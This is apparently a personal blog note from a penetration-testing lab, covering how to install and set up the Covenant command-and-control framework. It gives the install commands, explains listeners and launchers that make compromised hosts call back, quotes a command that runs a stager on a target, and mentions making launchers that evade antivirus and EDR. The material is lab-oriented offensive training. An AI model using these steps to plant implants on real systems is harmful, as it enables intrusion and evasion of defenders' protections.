In light of being advised to use Covenant during the Cybernetics pro labs from HTB and absolutely falling in love with it’s power, simplicity, and organisation I decided to type up some notes for myself regarding the installation and basic setup.
Installation and Startup documentation for more details on running with Docker.
git clone --recurse-submodules https://github.com/cobbr/Covenant wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb dpkg -i packages-microsoft-prod.deb apt-get update sudo apt-get install apt-transport-https sudo apt-get update sudo apt-get install dotnet-sdk-2.2 cd Covenant/Covenant dotnet build dotnet run
Covenant runs on https://0.0.0.0:7443/.
The beauty of Covenant listeners is you only need to create one. No more running out of valid ports for reverse shells when you’re pivoting through 6 hosts.
After starting a listener you need to create a launcher, the launcher is what is executed on the target host. When it’s executed it spawns a grunt and you’ll receive a connection back on the Covenant interface.
The launcher tab contains a list of the various launchers that can be generated for the desired listener:
Binary Launcher page for example:
I found that the
Net35 Dot Net Framework Version for the Binary Launcher worked on some hosts but not on others, however the
Net40 version had no problems whatsoever:
Download you should have a
GruntStager.exe file downloaded to your local machine. Simply upload and run
start /B C:\programdata\GruntStager.exe.
If endpoint protections are up-to-date then the standard launchers will get picked up, donut however allows you to create undetectable grunt launchers that can evade AV and EDR.